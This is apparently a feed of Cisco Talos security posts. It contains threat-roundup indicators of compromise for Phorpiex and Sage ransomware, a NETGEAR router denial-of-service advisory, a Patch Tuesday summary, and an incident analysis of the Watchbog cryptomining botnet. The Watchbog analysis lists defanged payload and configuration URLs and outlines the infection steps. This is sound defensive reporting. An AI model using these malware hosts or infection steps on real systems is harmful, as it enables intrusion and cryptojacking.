<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: pmoywyfxuah
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: timdnedsfpy
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: gygyxbzlyev
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: faopdrnwmix
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: zpkiquyxsdb
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: lqerbrodiev
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: hspjekelvqt
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: mmdbduldnwd
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: rwsrrtanpih
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: ukyzgbixnjn
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: bnsxxppkywd
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: wuanhvperbe
1
MutexesOccurrences
Global\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c12
\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=ab8e4b3e3c28b0e410
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
66[.]171[.]248[.]17812
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ipv4bot[.]whatismyipaddress[.]com12
ns1[.]wowservers[.]ru12
carder[.]bit12
1[.]1[.]168[.]192[.]in-addr[.]arpa12
ransomware[.]bit12
ns2[.]wowservers[.]ru12
1[.]0[.]168[.]192[.]in-addr[.]arpa10
Files and or directories createdOccurrences
%APPDATA%\Microsoft\<random, matching '[a-z]{6}'>.exe12

File Hashes

067cdd8df478938f229dcedc5f65fd4cf92c66d3c516ba60ae4355d5cfd06a4b 2d6a8bbf44f9459a31692b826a86be3ec55a2fae943b01f1dbfe78bf033ff7ed 32c22604944c7f284fdd4495613bb7d0f7cf274677df9f2d4fb2c38369dba438 4135c6461d7866f9b1841bc7ecbc3e4ff58681e2b80f79e9a7daade0ca014678 72ca8e7098802482b51ba77305cb22d52180444ff2925ed20d8eb1ca0dac5c56 7deada88e32db501dfcfb1aa0b9328c94b8a92561477d01e6b1a3b74e092e56f a10f24291658cec5c7674d2a0a28ce019a69db9af92f3ce8b5b5a8c01c166e5f a2f4c15b34be976d49f35e8363e220f88d59e17ab056b9049d872c6eec04f27f b2526566d9c11b59d36b80c035653ec56a23c5aac8c49c6d7ce3657441e357b2 d2ec413f2c120332e05f71f899094794a9c0092b220ef86633d499bcdcf997ee f8a6408e3a5a75772246c8dba4a39311ef82a5c5e5445fd817375610606bac66 f8d8c881aa3b875216dff9aad38648fe95ad99ee53b3b6652d3172187eded48f

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


Win.Malware.Phorpiex-7145044-1

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE
Value Name: DisableSR
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesOverride
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AutoUpdateDisableNotify
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft Windows Driver
9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft Windows Driver
9
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS 3
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\SORTANDLIFE 2
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\SORTANDLIFE\RECENT FILE LIST 2
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\SORTANDLIFE\SETTINGS 2
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
Value Name: Blob
1
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\HEXEDITOR 1
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\HEXEDITOR\RECENT FILE LIST 1
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\HEXEDITOR\SETTINGS 1
MutexesOccurrences
50694035
50705084
rc/Administrator1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
185[.]176[.]27[.]1329
7[.]5[.]7[.]79
208[.]100[.]26[.]2517
35[.]225[.]160[.]2457
193[.]32[.]161[.]735
68[.]178[.]213[.]371
66[.]218[.]85[.]1511
96[.]114[.]157[.]801
64[.]136[.]44[.]371
212[.]227[.]15[.]91
104[.]47[.]44[.]331
173[.]194[.]66[.]271
212[.]54[.]58[.]111
104[.]47[.]9[.]331
104[.]47[.]6[.]331
172[.]217[.]197[.]261
24[.]201[.]245[.]371
64[.]98[.]36[.]41
202[.]137[.]234[.]301
69[.]168[.]106[.]331
64[.]8[.]70[.]1041
34[.]212[.]80[.]541
212[.]227[.]15[.]101
209[.]17[.]115[.]101
104[.]20[.]17[.]2421
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
eguaheoghouughahse[.]top9
rzhsudhugugfugugso[.]io9
daedagheauehfuuhfp[.]co9
aeifaeifhutuhuhuse[.]top9
bfagzzezgaegzgfaik[.]su9
huaeokaefoaeguaeho[.]io9
aeoughaoheguaoehdl[.]cc9
gaohrhurhuhruhfsdk[.]su9
gaoehuoaoefhuhfugl[.]cc9
afaeigaifgsgrhhafo[.]io9
befaheaiudeuhughgl[.]cc9
aeufuaehfiuehfuhfe[.]top9
afaigaeigieufuifie[.]top9
aeoughaoheguaoehde[.]top9
gaghpaheiafhjefijo[.]io9
aegohaohuoruitiiep[.]co9
eaeuafhuaegfugeude[.]top9
eguaheoghouughahsp[.]co9
gaoehuoaoefhuhfugk[.]su9
rzhsudhugugfugugse[.]top9
afaigaeigieufuifik[.]su9
eaeuafhuaegfugeudo[.]io9
urusurofhsorhfuuho[.]io9
rzhsudhugugfugugsp[.]co9
bfagzzezgaegzgfail[.]cc9
*See JSON for more IOCs
Files and or directories createdOccurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp10
\autorun.inf9
\.lnk9
\__\DriveMgr.exe9
E:\$RECYCLE.BIN9
E:\autorun.inf8
E:\__\DriveMgr.exe8
E:\.lnk8
E:\__8
%APPDATA%\winsvcs.txt8
E:\__\$RECYCLE.BIN7
E:\__\System Volume Information7
%TEMP%\20402.exe1
%TEMP%\27375.exe1
%TEMP%\14527.exe1
%TEMP%\13598.exe1
%TEMP%\26079.exe1
%TEMP%\25060.exe1
%TEMP%\37440.exe1
%TEMP%\39807.exe1
%TEMP%\10643.exe1
%TEMP%\16693.exe1
%TEMP%\11927.exe1
%TEMP%\29428.exe1
%TEMP%\14209.exe1
*See JSON for more IOCs

File Hashes

0d338324cf835af918aeb90f63e3d3e96f1f21136005162bff9eb7dff51d5efb 1924bd8e0c2679662f36c52fb7c1acb170e9ad71c55d1b53b70e55f3db71d644 48eac3b34c05886e1338554f54ca7022fa15215dd22d4a6bf62d6c531ba1a3f7 5e1d7375f3e2bb793908e0fa30b5d50e330024be2482f1d6be2c17395bd3b104 65ebf8cd6280fc0c6d3261ecb07e928dec08a6c3a9a814008faeb9053da5485e 6d65ccab03a62d84f12ac21fd02f44805c34696951e3dfb79ca042d8b832cd89 8a60f95d39f7255e1fd83aac66e0d922ca0a235069d7fca74a4ca07aa5ff5f96 c9d8bbeecb57aa0e4f59bad6e574470fe3ff8cc1685f38b16b6fa5435791231f de730a7cf6d436b4e93c0a857cd72074bb2bc1dfd5fda10e25125773711526a9 e0af9dcc27483bcdad52558aa19224a0338343e0456ad1e663e0b42fdd53520f

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


Win.Ransomware.Sage-7144073-1

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
Value Name: GlobalAssocChangedCounter
14
<HKCU>\CONTROL PANEL\DESKTOP
Value Name: Wallpaper
14
<HKCR>\.SAGE 14
<HKCR>\SAGE.NOTICE\DEFAULTICON 14
<HKCR>\SAGE.NOTICE\FRIENDLYTYPENAME 14
<HKCR>\SAGE.NOTICE\SHELL\OPEN\COMMAND 14
<HKCR>\HTAFILE\DEFAULTICON 14
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 14
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
14
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS
Value Name: _CommentFromDesktopINI
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS
Value Name: _LabelFromDesktopINI
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS 6
<HKCR>\.SAGE 1
<HKCR>\SAGE.NOTICE 1
<HKCR>\SAGE.NOTICE\DEFAULTICON 1
<HKCR>\SAGE.NOTICE\FRIENDLYTYPENAME 1
<HKCR>\SAGE.NOTICE\SHELL 1
<HKCR>\SAGE.NOTICE\SHELL\OPEN 1
<HKCR>\SAGE.NOTICE\SHELL\OPEN\COMMAND 1
<HKCR>\HTAFILE 1
<HKCR>\HTAFILE\DEFAULTICON 1
MutexesOccurrences
zHUoNUQ714
\BaseNamedObjects\PFShggN313
\BaseNamedObjects\adX9ZN6Z13
\BaseNamedObjects\nkB7lqma1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
5[.]45[.]17[.]3614
5[.]45[.]100[.]13314
5[.]45[.]107[.]16114
5[.]45[.]107[.]16714
5[.]45[.]208[.]3614
138[.]197[.]5[.]5114
138[.]197[.]17[.]15614
138[.]197[.]90[.]3614
138[.]197[.]90[.]4014
138[.]197[.]90[.]6014
138[.]197[.]100[.]5114
138[.]197[.]107[.]1314
138[.]197[.]223[.]9914
139[.]59[.]5[.]19114
139[.]59[.]17[.]8014
139[.]59[.]46[.]4514
139[.]59[.]107[.]9114
139[.]59[.]125[.]814
139[.]59[.]125[.]15414
139[.]59[.]183[.]414
139[.]59[.]183[.]17014
139[.]59[.]184[.]13714
139[.]59[.]198[.]1214
139[.]59[.]198[.]4814
139[.]59[.]198[.]11614
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
mbfce24rgn65bx3g[.]jktew0[.]com14
mbfce24rgn65bx3g[.]jpo2z1[.]net14
Files and or directories createdOccurrences
%HOMEPATH%14
%System32%\Tasks\N0mFUQoa14
%TEMP%\__config252888.bat14
%APPDATA%\Rj3fNWF3.exe14
%APPDATA%\s1qoaKDO.tmp14
E:\!HELP_SOS.hta14
\!HELP_SOS.hta14
%TEMP%\DDx.bmp14
%APPDATA%\f1.hta14
%HOMEPATH%\Desktop\!HELP_SOS.hta14
%HOMEPATH%\Documents\!HELP_SOS.hta14
%HOMEPATH%\Documents\Outlook Files\!HELP_SOS.hta14
%PUBLIC%\Desktop\!HELP_SOS.hta14
%PUBLIC%\Documents\!HELP_SOS.hta14
%TEMP%\f1.vbs13

File Hashes

0558a89422c627ed31af6d34293b1de99ebd9f8538d8c29bf830b9302dd9aa56 25fd8664218cae1ca68b42245729c6cd00bbf3033704adf66c3ed56604d7e49c 42266cea4387c3bfa085ead6686fb91936a65bf8110c328b4e898771240e7b00 785c3dde4d85cd5ff2e1a826801c3813c2dd08fd547628aaf83bd9baeaf1f9c9 91a103e0a3a93dc681e7de5af18850933d2435a1d6cef35f85e7855f14c3ec02 9dd1839b1090c0467211f689214df91e5eb8e73830f2a2ea9e3408e527fe4096 a462ea6b325c5b91513498401fe7213cee84b61f04278616c51cae7238e57225 adf288cbaea7fadb2b2f152ebccab141a94cccce33d343fd9c5d42bfe65e57eb b238d1eb5e3ef4e3f5c93ead5032ad0bd67716ff555cf1a3649397ad2e3dcaef b5678f253a2c15a3caa25840b16421b4458928d0ddffaf1fb941a4aff1061f38 b61628da0124170e6bfeb5f282da74d06c5a6cffcd05681ce8cd069ec7831404 d59ec8d355d30d035faf50a342e1f1b67b44764db114a373c503098847718db3 d7e794446a774f9f3cacdbd58345a1a52f988eaff24c122800a9aa9b0e094e08 f44c64cc3c06ebb0c2e3333227e82568a14e7cc4400679cd85228f8882f0a416

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


Malware




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (5286)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Madshi injection detected - (2638)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Kovter injection detected - (1427)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Process hollowing detected - (1081)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Trickbot malware detected - (220)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Gamarue malware detected - (193)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (97)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Excessively long PowerShell command detected - (65)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
PowerShell file-less infection detected - (49)
A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
Dealply adware detected - (30)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.

Vulnerability Spotlight: Denial-of-service vulnerabilities in some NETGEAR routers

$
0
0

Dave McDaniel of Cisco Talos discovered these vulnerabilities.

The NETGEAR N300 line of wireless routers contains two denial-of-service vulnerabilities. The N300 is a small and affordable wireless router that contains the basic features of a wireless router. An attacker could exploit these bugs by sending specific SOAP and HTTP requests to different functions of the router, causing it to crash entirely.

In accordance with our coordinated disclosure policy, Cisco Talos worked with NETGEAR to ensure that these issues are resolved and that an update is available for affected customers.



Vulnerability details

NETGEAR N300 WNR2000v5 unauthenticated host access point daemon denial-of-service vulnerability (TALOS-2019-0831/CVE-2019-5054)

An exploitable denial-of-service vulnerability exists in the session handling functionality of the NETGEAR N300 (WNR2000v5) HTTP server. An HTTP request with an empty User-Agent string sent to a page requiring authentication can cause a null pointer dereference, resulting in the HTTP service crashing. An unauthenticated attacker can send a specially crafted HTTP request to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

NETGEAR N300 WNR2000v5 unauthenticated host access point daemon denial-of-service vulnerability (TALOS-2019-0832/CVE-2019-5055)

An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that NETGEAR N300 WNR2000v5 router, firmware version V1.0.0.70, is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 50040

Microsoft Patch Tuesday — Sept. 2019: Vulnerability disclosures and Snort coverage

$
0
0











By Jon Munshaw.

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 85 vulnerabilities, 19 of which are rated “critical," 65 that are considered "important" and one "moderate." There is also a critical advisory relating to the latest update to Adobe Flash Player.

This month’s security update covers security issues in a variety of Microsoft services and software, including the Jet Database Engine and the Hyper-V hypervisor. Most notably, this release contains another round of vulnerabilities in remote desktop services, the latest in a line of RDP bugs that are considered "wormable." Talos has already outlined how Cisco Firepower users can stay protected from other series of RDP vulnerabilities known as "BlueKeep" and "DejaBlue."

Talos also released a new set of SNORTⓇ rules that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post here.

Critical vulnerabilities

Microsoft disclosed 19 critical vulnerabilities this month, all of which we will highlight below.

CVE-2019-1296, CVE-2019-1291, CVE-2019-1290, CVE-2019-0788 and CVE-2019-0787 are all remote code execution vulnerabilities in Windows Remote Desktop Protocol. An attacker can exploit these bugs by sending a specially crafted request to the target system's RDP. If successful, the attacker could then gain the ability to execute arbitrary code. These vulnerabilities are pre-authentication and require no user interaction. These are the latest in a line of RDP vulnerabilities that have garnered attention for being "wormable," meaning an attacker could exploit these vulnerabilities and then spread malware from machine to another easily.

CVE-2019-1257 and CVE-2019-1295 are remote code execution vulnerabilities in Microsoft SharePoint, a document manager and storage system. Some APIs in the software are exposed in unsafe ways, opening them up to exploitation if the user opens a specially crafted file. An attacker could exploit these vulnerabilities to gain the ability to execute code in the context of the SharePoint application pool and SharePoint server farm account.

CVE-2019-0719 and CVE-2019-0721 are remote code execution vulnerabilities in the Windows Hyper-V hypervisor. These bugs arise when the Hyper-V Network Switch on a host server improperly validates input from an authenticated user on a guest operating system. An attacker could exploit these by running a specially crafted application on a guest OS, potentially causing the Hyper-V host OS to execute arbitrary code.

CVE-2019-1138, CVE-2019-1217, CVE-2019-1237, CVE-2019-1298 and CVE-2019-1300 are remote code execution vulnerabilities in Chakra Scripting Engine when the engine attempts to handle objects in memory in the Microsoft Edge web browser. An attacker could exploit these bugs to corrupt memory on the target system, and then gain the ability to execute arbitrary code on the victim machine. A user can only trigger these vulnerabilities by clicking on an attacker-created web site in Microsoft Edge or a malicious ad on another site. CVE-2019-1221 is similar to these vulnerabilities, only it exists in Internet Explorer's scripting engine.

CVE-2019-1208 and CVE-2019-1236 are remote code executions in the VBScript engine that exist in the way the engine handles objects in memory. An attacker could exploit these vulnerabilities by tricking the user into visiting a specially crafted website on Internet Explorer. Additionally, they could embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that utilizes the Internet Explorer rendering engine.

CVE-2019-1280 is a vulnerability in Microsoft Windows that could allow an attacker to execute arbitrary code if they trick a user into opening a specially crafted .LNK file. If successful, the attacker could gain the same user rights as the local user.

CVE-2019-1306 is a remote code execution vulnerability that exists in Azure DevOps Server and Team Foundation Server when the software improperly validates certain inputs. An attacker could exploit this bug by tricking the user into opening a specailly crafted file with a vulnerable version of the .NET Framework or Visual Studio. Additionally, the user could open a malicious attachment in an email. If successful, the attacker could execute code with the same rights as the current user.

                Important vulnerabilities

                This release also contains 65 important vulnerabilities, five of which we will highlight below.

                CVE-2019-1214, CVE-2019-1215 and CVE-2019-1279 are elevation of privilege vulnerabilities in the Windows Common Log File System (CLFS) driver. An attacker could exploit these bugs to run certain processes with elevated rights. An attacker would need to log onto the target system first, and then run a specially crafted application. Information from Microsofts states that malicious users have already exploited these vulnerabilities in the wild.

                CVE-2019-1216 and CVE-2019-1219 are vulnerabilities in DirectX that an attacker could exploit to see the contents of Kernel memory on the victim machine, which could allow them to execute additional attacks. These bugs exist in the way DirectX improperly handle objects in memory.

                The other important vulnerabilities are:

                Moderate vulnerability

                There is one moderate vulnerability, CVE-2019-1259, a spoofing vulnerability in Microsoft SharePoint.

                Coverage 

                In response to these vulnerability disclosures, Talos is releasing a new SNORTⓇ rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

                These rules are: 51436 - 51438, 51445, 51446, 51449 - 51452, 51454 - 51457, 51463 - 51465, 51479 - 51483

                Beers with Talos Ep. #61: Hacking for good is a bad idea

                $
                0
                0


                Beers with Talos (BWT) Podcast episode No. 61 is now available. Download this episode and subscribe to Beers with Talos:

                If iTunes and Google Play aren't your thing, click here.

                Recorded Aug. 30, 2019: In this extra-sized episode, we cover a lot, starting with Retadup, and discussing the intricate workings of why it’s a bad idea to execute code on other computers without permission when you have no idea what that computer is doing. WannaCry is making some headlines again, but this time it isn’t WannaCry and, frankly, it’s not news. From the mobile ecosystem operating system battleground, Google’s Project Zero announced several vulnerabilities in iOS that have been discovered being exploited in the wild, with some of the exploit chains leveraging zero-days. The most important development of the week is that journalists are now quoting Matt's Twitter timeline and this will certainly end well.

                The timeline:

                • 01:30 — Roundtable: Telecasters, Joel requests drunk calls, what your Twix choices say about you.
                • 15:15 — Retadup takedown: Let’s chat about running code on other people’s computers (hint: it’s a bad idea).
                • 29:25 — WannaCry (but not really) is still a threat to things it’s already been hitting since forever. Surprise.
                • 42:50 — Project Zero uncovers several exploit chains containing Apple/iPhone zero-day.
                • 55:55 — Closing thoughts and parting shots.
                ==========

                Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
                Hosted by Mitch Neff (@MitchNeff)

                Subscribe via iTunes (and leave a review!)


                Subscribe to the Threat Source newsletter


                Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

                Watchbog and the Importance of Patching

                $
                0
                0

                What Happened?


                Cisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog cryptomining botnet. The attackers were able to exploit CVE-2018-1000861 to gain a foothold and install the Watchbog malware on the affected systems.

                This Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker's intentions and abilities on a customer's network by analyzing the various Pastebins. As the investigation progressed, CSIRS identified and de-obfuscated multiple pastes using artifacts left on compromised hosts.

                There were some attempts at obfuscation, such as base64 encoding URLs and Pastebins, but the attack was still relatively simple to uncover - this attacker did not practice particularly strong operational security.

                The attackers behind Watchbog claimed to be providing a service by identifying security vulnerabilities and aiding the organization by exploiting said weaknesses before any "real" hackers could do so. During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the "positive" intentions of this adversary. Below is a message left on a compromised system by the adversary:




                What does Watchbog do?


                The Watchbog botnet mines Monero cryptocurrency for its owners. While researching our variant we came across a post by Alibaba Cloud Security that provides some insights into Watchbog. This post coincided with our findings as we found an installation script that performs the following activities.

                First the installation script checks for running processes matching other cryptocurrency miners. If the system was previously configured to mine cryptocurrency, the installation script would terminate their execution using the kill command:




                The script then uses the touch command to determine its capability to write to various directories on the filesystem.




                It also checks the architecture of the system to determine if it is executing on a 32-bit or 64-bit operating system and then makes three attempts to download and install a 'kerberods' dropper using wget or curl.



                Depending on permissions, the kerberods dropper is saved to one of the following directories:

                • The current working directory
                • /usr/bin
                • /usr/libexec
                • /usr/local/bin
                • /tmp
                • /usr/sbin


                The script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information. CSIRS verified this as the same wallet ID as the one used by the attacker referenced in the Alibaba cloud post referenced earlier.



                Though the Pastebin URL in the previous screenshot is no longer accessible, the next step in the infection process is to download the cryptocurrency miner. We identified a script that 'kerberods' likely runs to reach out to GitHub to install the XMR-Stak Monero miner.

                The main part of the script checks to see if a process called 'watchbog' is running.



                If the 'watchbog' process is not detected, the 'testa' or 'download' functions are called to install the version of the miner that's compatible with the host operating system and architecture and execute it to begin the mining process.



                'Testa' function


                As previously mentioned, the 'testa' function may be called to facilitate the infection process. Below is the code associated with this function. This code is responsible for writing the various configuration data used by the mining software. The function declares three variables and assigns base64 encoded data to each of them.



                The base64 encoded data is then decoded and written to various files.



                The base64 encoded values correspond to the following:

                • St_64: This variable contains the URL of the Github repository that hosts the XMR-Stak mining client.
                • hXXps://github[.]com/fireice-uk/xmr-stak/releases/download/2.10.3/xmr-stak-linux-2.10.3-cpu.tar.xz


                • con_url: This variable contains the Pastebin URL that is used to host the configuration file for the mining client.
                • hXXps://pastebin[.]com/raw/YJH8sWr


                • Cpu_url: This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.
                • hXXps://pastebin[.]com/raw/irzk5mSh


                • poo_url:This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.
                • hXXps://pastebin[.]com/raw/aJkbTx6Y


                The script then starts the Watchbog process and deletes the text file after downloading the encoded Pastebins as a text file and giving it execution permissions. The following screenshot shows the configuration file that is referenced by the con_url variable in the 'testa' function.



                'download' function


                The following code is associated with the 'download' function referenced by the installation script previously described. Similar to what was described in the 'testa' function, it contains three declared variables with base64 encoded assignments.



                These base64 encoded strings correspond to the following:

                • mi_64: This variable contains the Github URL that hosts the XMrig monero mining client.
                • hXXps://github[.]com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz


                • mi_32: This variable contains a Pixeldrain URL. During our investigation the URL was no longer accessible.
                • hXXps://pixeldrain[.]com/api/file/ZuVWceWG


                • der_ke: This variable contains a Pastebin URL. The URL was used to host a file containing the attacker(s) Monero Wallet ID for the miner to use. This Wallet ID is used to facilitate payment to the attacker. All Monero successfully mined by clients under the attacker's control will transfer the Monero to the Wallet ID specified in this file. The same wallet is included in the Alibaba Cloud post mentioned earlier.
                • hXXps://pastebin[.]com/raw/hURdMBLd


                The download function then writes the contents retrieved from the specified URLs to various file locations. It then determines the architecture of the system and installs the appropriate mining client and executes it to initiate the mining process.




                The following screenshot contains the contents of the Monero wallet configuration associated with the der_ke variable in the 'download' function described earlier. It specifies the configuration parameters that will be used by the mining client, including the Wallet ID, mining pool URL, and other parameters that can be used to control CPU usage, logging, etc.



                Lateral movement via SSH


                CSIRS identified that the adversary was using SSH to spread laterally. Although local logs were unavailable, we were able to use network logs to gain an understanding of how the malware was spreading. As we viewed the logs, it was easy to determine Watchbog's lateral movement mechanism because they were generating a large amount of SSH traffic. This could have been easily detected using internal traffic flow monitoring, such as with StealthWatch Cloud or other netflow-monitoring capability.

